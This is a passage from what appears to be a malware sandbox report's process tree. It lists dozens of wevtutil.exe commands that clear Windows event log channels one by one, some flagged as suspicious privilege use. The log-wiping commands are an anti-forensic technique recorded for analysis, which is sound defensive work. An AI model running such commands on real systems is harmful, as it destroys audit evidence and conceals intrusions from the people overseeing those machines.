  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1296
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:864
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1556
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1848
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
      4⤵
      PID:1668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
      4⤵
      PID:544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
      4⤵
      Clears Windows event logs
      PID:1780
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
      4⤵
      Clears Windows event logs
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
      4⤵
      Clears Windows event logs
      PID:1644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
      4⤵
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Backup"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
      4⤵
      PID:1612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
      4⤵
      PID:1716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
      4⤵
      PID:228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
      4⤵
      PID:1088
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
      4⤵
      PID:2016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
      4⤵
      PID:1956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
      4⤵
      PID:1492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
      4⤵
      Clears Windows event logs
      PID:1092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
      4⤵
      PID:856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
      4⤵
      PID:816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
      4⤵
      PID:672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
      4⤵
      PID:1576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
      4⤵
      Clears Windows event logs
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
      4⤵
      PID:1644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
      4⤵
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
      4⤵
      Clears Windows event logs
      PID:1612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
      4⤵
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
      4⤵
      PID:1716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
      4⤵
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
      4⤵
      Clears Windows event logs
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
      4⤵
      PID:1668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
      4⤵
      PID:544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
      4⤵
      Clears Windows event logs
      PID:1588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
      4⤵
      Clears Windows event logs
      PID:1272
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
      4⤵
      PID:1780
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
      4⤵
      PID:2024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
      4⤵
      PID:1764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
      4⤵
      PID:920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
      4⤵
      PID:1928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
      4⤵
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
      4⤵
      PID:1824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
      4⤵
      Clears Windows event logs
      PID:844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
      4⤵
      PID:1916
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
      4⤵
      Clears Windows event logs
      PID:1504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
      4⤵
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
      4⤵
      PID:824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
      4⤵
      PID:1476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
      4⤵
      PID:1168
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
      4⤵
      PID:1500
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
      4⤵
      PID:336
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
      4⤵
      Clears Windows event logs
      PID:228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
      4⤵
      Clears Windows event logs
      PID:1088
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
      4⤵
      Clears Windows event logs
      PID:2016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
      4⤵
      PID:1956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
      4⤵
      PID:1492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
      4⤵
      PID:1092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
      4⤵
      Clears Windows event logs
      PID:856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
      4⤵
      PID:816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
      4⤵
      PID:672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
      4⤵
      PID:1576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
      4⤵
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
      4⤵
      Clears Windows event logs
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
      4⤵
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
      4⤵
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
      4⤵
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
      4⤵
      Clears Windows event logs
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
      4⤵
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
      4⤵
      PID:1716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
      4⤵
      Clears Windows event logs
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
      4⤵
      PID:1668
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
      4⤵
      PID:544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
      4⤵
      PID:1804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
      4⤵
      PID:1588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
      4⤵
      PID:1272
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
      4⤵
      PID:1780
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
      4⤵
      PID:2024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
      4⤵
      Clears Windows event logs
      PID:1764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
      4⤵
      PID:920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
      4⤵
      PID:1928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
      4⤵
      Clears Windows event logs
      PID:1724
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
      4⤵
      PID:1824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
      4⤵
      PID:844
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
      4⤵
      PID:1916
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
      4⤵
      PID:1504
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
      4⤵
      PID:1140
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
      4⤵
      PID:824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
      4⤵
      PID:1476
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
      4⤵
      PID:1168
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
      4⤵
      Clears Windows event logs
      PID:1500
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
      4⤵
      PID:336
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
      4⤵
      PID:228
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
      4⤵
      PID:1088
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Help/Operational"
      4⤵
      PID:2016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
      4⤵
      PID:1956
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
      4⤵
      PID:1492
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
      4⤵
      PID:1092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
      4⤵
      PID:856
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
      4⤵
      PID:816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
      4⤵
      PID:672
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
      4⤵
      PID:1576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
      4⤵
      Clears Windows event logs
      PID:1464
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
      4⤵
      PID:1552
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
      4⤵
      PID:900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
      4⤵
      PID:208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
      4⤵
      PID:1392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
      4⤵
      Clears Windows event logs
      PID:1992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-International/Operational"
      4⤵
      PID:1056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
      4⤵
      PID:1736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
      4⤵
      PID:536
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
      4⤵
      PID:2020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
      4⤵
      PID:1580
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
      4⤵
      PID:1340
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:1120
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
      4⤵
      PID:1132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
      4⤵
      Clears Windows event logs
      PID:156
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
      4⤵
      PID:1716
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
      4⤵
      PID:660
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
      4⤵
      PID:240
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
      4⤵
      PID:952
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
      4⤵
      PID:232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
      4⤵
      PID:224
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
      4⤵
      PID:1352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
      4⤵
      PID:1768
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
      4⤵
      PID:1752
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
      4⤵
      PID:212
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
      4⤵
      PID:1192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
      4⤵
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
      4⤵
      PID:1080
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
      4⤵
      PID:544
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
      4⤵
      PID:1804
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
      4⤵
      PID:1588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
      4⤵
      PID:1272
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
      4⤵
      PID:1780
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
      4⤵
      PID:2024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
      4⤵
